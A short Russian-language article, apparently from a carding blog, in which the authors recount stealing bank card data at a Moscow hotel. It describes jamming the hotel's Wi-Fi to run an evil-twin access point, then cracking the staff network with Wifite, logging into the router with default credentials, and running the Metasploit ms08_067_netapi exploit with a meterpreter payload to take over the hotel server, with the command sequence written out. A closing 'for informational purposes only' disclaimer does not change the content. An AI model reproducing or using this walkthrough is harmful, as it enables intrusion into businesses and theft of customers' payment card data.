Начинаем
В начале вылазки мы расположились в кафе, прилегающем к одному достаточно популярному отелю в центре Мск. Наша идея заключалась в следующем: глушим бесплатный Wi-Fi от отеля и создаем нашего двойника с таким же названием и естественно без пароля! Стоит сказать, что все удалось, но результат не особо радовал - всего 4 карты за 6,5 часов. Поняв, что большинство людей здесь не расплачиваются картой через интернет, мы решили пойти совсем другим путем, о нем и будет сегодняшняя статья.
Что касается сути нашей идеи, тут все достаточно просто:
- Взломать сервер отеля;
- Достать с него данные банковских карт.
Теперь на практике
- Взламываем Wi-Fi точку доступа, предназначенную для сотрудников.
Используя Kali Linux и простейший, предустановленный Wifite. Перехватываем рукопожатие и расшифровываем его.
Для начала чистим файл хэндейшка от мусора, затем расшифровываем его и получаем пароль.
Пароль админки на роутере оказался таким же, как и пароль от самой точки. А логин... Внимание... admin.
- Попадаем в настройки роутера и чекаем ip сервера.
Нашли.
- Далее нам понадобится винда и сканер портов Nmap.
Доступ мы будем получать через exploit.
В терминале мы пишем:
"msfconsole" "nmap -v 192.168..... (айпи сервера) "search netapi"
и "exploit/windows/smb/ms08_067_netapi"
"show options"
"set RHOST (ip)"
"show payloads"
"set payload windows/meterpreter/bind_tcp"
"show options"
"exploid"
Всё! Мы получили доступ к серверу
"shell" - cmd жертвы.
Дальше мы просто устанавливаем нужный софт и все данные текут прямо нам в руки.
Данная статья представлена исключительно в ознакомительных целях и не несёт призыва к действию. Вся информация направлена на то, чтобы уберечь читателей от противозаконных действий.